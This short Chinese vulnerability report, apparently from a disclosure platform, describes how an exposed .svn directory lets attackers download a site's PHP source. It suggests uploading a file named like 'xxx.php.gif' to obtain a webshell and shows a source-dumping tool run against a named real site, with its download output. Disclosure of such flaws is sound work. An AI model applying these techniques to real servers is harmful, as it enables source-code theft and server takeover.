感谢leehenwu投递
有的站点使用.svn来做生产环境版本控制,但是.svn目录没有做访问权限限制,可以通过.svn/entries来遍历文件和目录列表。 为了节约体力,我写了一个php脚本来做这件事,如果*.php.svn-base不被当.php来执行,那么恭喜你,svn中的.php程序源码随你下了,分析源码可能能帮助你发现更多漏洞。 如果.php.svn-base被当成php文件来执行了,可能看到php错误信息(看到真实路径)或内容为空白,那么,同样恭喜你,这个站点有扩展名识别问题,找地方上传xxx.php.gif也许就可以直接得到webshell了。
漏洞证明:/usr/local/bin/svn_clone -cvvvu http://www.2.newsmth.net
*** 下载bbspsttmpl.php 文件
写入bbspsttmpl.php 到/data/src/www.2.newsmth.net (4190 bytes)
*** 下载default-sf.css 文件
写入default-sf.css 到/data/src/www.2.newsmth.net (9700 bytes)
*** 下载www2-admin.php 文件
写入www2-admin.php 到/data/src/www.2.newsmth.net (1819 bytes)
*** 下载bbspst.php 文件
写入bbspst.php 到/data/src/www.2.newsmth.net (2716 bytes)
下载地址:http://rains.im/?q=node/18 |